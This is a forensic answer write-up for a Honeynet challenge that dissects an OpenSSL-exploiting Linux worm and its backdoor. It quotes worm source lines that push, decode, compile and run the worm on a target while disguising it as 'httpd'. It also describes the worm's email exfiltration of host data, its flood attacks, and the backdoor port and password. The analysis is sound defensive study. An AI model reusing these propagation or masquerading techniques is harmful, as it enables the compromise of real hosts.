Honeynet Project Scan of the Month - November 2002

Answers to Scan 25

By: Jason Testart <jtestart@ryerson.ca>

1. Which is the type of the .unlock file? When was it generated?

Running the file command on Linux yields the answer:
$ file .unlock 
.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 06:59:04 2002, os: Unix
$ gzip -l -S "" .unlock
         compressed        uncompressed  ratio uncompressed_name
              17973               81920  78.0% .unlock
$ mv .unlock .unlock.Z
$ gunzip .unlock.Z
$ file .unlock
.unlock: GNU tar archive
So, the file .unlock is a gzip compressed tar file generated at 06:59:04 the morning of September 20th, 2002.
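As an added example (not part of the original write-up), the same identification done programmatically: the gzip MTIME field is read straight from the fixed 10-byte header, the payload is decompressed, and the "ustar" magic at byte 257 confirms a tar archive. The sample archive is constructed in memory, and SAMPLE_MTIME assumes the page's timestamp is UTC, which the page does not state.

```python
import calendar
import gzip
import io
import struct
import tarfile
import time

GZIP_MAGIC = b"\x1f\x8b"
TAR_MAGIC_OFFSET = 257          # "ustar" sits at byte 257 of the first tar header
# Constructed: the page's "Fri Sep 20 06:59:04 2002" read as UTC (the zone is not stated)
SAMPLE_MTIME = calendar.timegm((2002, 9, 20, 6, 59, 4, 0, 0, 0))

def gzip_mtime(data: bytes) -> int:
    """MTIME (seconds since the epoch) from the fixed 10-byte gzip header."""
    if len(data) < 10 or data[:2] != GZIP_MAGIC:
        raise ValueError("not gzip data")
    # layout: ID1 ID2 CM FLG MTIME(4, little-endian) XFL OS
    cm, _flg, mtime, _xfl, _os = struct.unpack("<BBIBB", data[2:10])
    if cm != 8:
        raise ValueError("unknown gzip compression method %d" % cm)
    return mtime

def is_tar(data: bytes) -> bool:
    return data[TAR_MAGIC_OFFSET:TAR_MAGIC_OFFSET + 5] == b"ustar"

def classify(data: bytes) -> dict:
    """Header timestamp plus what the decompressed payload is; mirrors file(1) + gunzip."""
    mtime = gzip_mtime(data)
    inner = gzip.decompress(data)
    return {
        "mtime": mtime,
        "mtime_utc": time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(mtime)),
        "uncompressed_size": len(inner),
        "inner_is_tar": is_tar(inner),
    }

def build_sample() -> bytes:
    """Constructed stand-in for .unlock: a tar of two placeholder sources, gzipped with SAMPLE_MTIME."""
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w") as tf:
        for name in (".unlock.c", ".update.c"):
            body = b"/* placeholder for " + name.encode() + b" */\n"
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tf.addfile(info, io.BytesIO(body))
    gz_buf = io.BytesIO()
    with gzip.GzipFile(fileobj=gz_buf, mode="wb", mtime=SAMPLE_MTIME) as gz:
        gz.write(tar_buf.getvalue())
    return gz_buf.getvalue()
```

Running classify(build_sample()) reports the header timestamp and that the payload is a tar archive, the same two facts the file and gunzip commands above established.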


2. Based on the source code, who is the author of this worm? When was it created? Is it compatible with the date from question 1?

To answer this question, I first looked at the table of contents of the unzipped tar file:
$ tar tvf .unlock 
-rw-r--r-- root/wheel    70981 2002-09-20 09:28:11 .unlock.c
-rw-r--r-- root/wheel     2792 2002-09-19 17:57:48 .update.c
So, the timestamps of the source files are 2002-09-20 09:28:11 and 2002-09-19 17:57:48, which do not correspond to the date from question 1, since 2002-09-20 09:28:11 is later than Fri Sep 20 06:59:04 2002. This difference could be explained by the gzip file having been generated on a different machine from the source code. Perhaps a badly set clock, or a difference in time zones between the two computers, accounts for the difference?

The comments at the beginning of the .unlock.c file indicate that the worm was written by aion@ukr.net and contem@efnet. I suspect aion@ukr.net wrote most of the "worm" code, with the DDoS code written by contem@efnet.


3. Which process name is used by the worm when it is running?

The worm uses the process name httpd when running. We know this because of line 78 and lines 1803 through 1805 of the file .unlock.c:
78:#define PSNAME               "httpd "
1803:   for(a=0;argv[0][a]!=0;a++) argv[0][a]=0;
1804:   for(a=0;argv[1][a]!=0;a++) argv[1][a]=0;
1805:   strcpy(argv[0],PSNAME);
The code above overwrites the process name and its single argument with null characters, then copies the value of the macro PSNAME over the process name, which in this case is "httpd " (note the trailing space). Note that at line 1425 of the .unlock.c file, the process on a target computer is first started as:
/tmp/httpd {IP address of attacker}
and ultimately rewritten as:
httpd


4. In which format does the worm copy itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine?

The code block beginning at line 1416 of .unlock.c gives us the answers:
  writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
  zhdr(1);
  encode(sockfd);
  zhdr(0);
  writem(sockfd,"__eof__\n");
  writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
                "tar xzf /tmp/.unlock -C /tmp/;              "
                "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
                "gcc -o /tmp/update /tmp/.update.c;\n");
  sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip);
  writem(sockfd,rcv);
  sleep(3);
  writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
                "       /tmp/httpd /tmp/update; exit; \n");
In the code above, we see the worm writing the output of the encode function to the file /tmp/.unlock.uu on the target machine, then using the target machine's uudecode command to generate /tmp/.unlock. The file /tmp/.unlock, a gzipped tar file, is then extracted to produce the C source files /tmp/.unlock.c and /tmp/.update.c, which are in turn compiled to /tmp/httpd and /tmp/update respectively. The worm then runs the two compiled binaries, and deletes all files except /tmp/.unlock. Only /tmp/.unlock remains on the machine.

The above process corresponds to the code in the encode function. The encode function uuencodes whatever is defined as WORMSRC, in this case, /tmp/.unlock. If this file is missing, then the worm cannot propagate.


5. Which port is scanned by the worm?

The worm does a TCP scan of port 80. This is evident from the call to the atcp_connect function with the SCANPORT parameter, a macro defined to be 80.


6. Which vulnerability does the worm try to exploit? On which architectures?

The worm tries to exploit the OpenSSL SSLv2 handshake vulnerability. The vulnerability is discussed in CERT Vulnerability Note #102795.

From line 1241 of the .unlock.c file, we see the array architectures, of type struct archs, that defines the Linux distributions and corresponding Apache versions that the worm targets. They are:

Linux Distro    Apache Version
------------    --------------
Gentoo          unknown
Debian          1.3.26
Red-Hat         1.3.6
Red-Hat         1.3.9
Red-Hat         1.3.12
Red-Hat         1.3.19
Red-Hat         1.3.20
Red-Hat         1.3.22
Red-Hat         1.3.23
Red-Hat         1.3.26
SuSE            1.3.12
SuSE            1.3.17
SuSE            1.3.19
SuSE            1.3.20
SuSE            1.3.23
Mandrake        1.3.14
Mandrake        1.3.19
Mandrake        1.3.20
Mandrake        1.3.23
Slackware       1.3.26


7. What kind of information is sent by the worm by email?  To which account?

When the worm first infects a computer, it makes an SMTP connection to the mail server freemail.ukr.net and sends an e-mail with the from address test@microsoft.com to the account aion@ukr.net. The e-mail contains the hostid and the hostname of the newly infected computer, along with the IP address of the computer that did the infecting (i.e. the attacking machine). The code that does this is in the mailme function of the .unlock.c file.


8. Which port (and protocol) is used by the worm to communicate to other infected machines?

The worm uses UDP port 4156 to communicate with other infected machines. It also uses UDP port 10100 to transmit e-mail addresses collected from all filesystems mounted on the infected machine, except /proc, /dev, and /bin, if directed to do so.


9. Name 3 functionalities built in the worm to attack other networks.

Among the many functionalities of this worm are UDP flood, TCP flood, and DNS flood. In a directive to attack, the worm will get the target, port (if applicable), and a duration of time to attack. These values are stored in records of type "*_rec", as defined in .unlock.c. Whenever the worm gets a command to attack, it will relay the command to other infected hosts it knows about.


10. What is the purpose of the .update.c program? Which port does it use?

The .update.c program is a backdoor that listens on TCP port 1052, as defined by the PORT macro. The backdoor requires the password aion1981.


11. Bonus Question:
What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

The UPTIME value is used to determine for how long the backdoor will stay bound and listening on the port PORT before closing all sockets and sleeping for SLEEPTIME seconds. The backdoor program runs in a continuous loop, listening for 10 seconds, then sleeping for 5 minutes.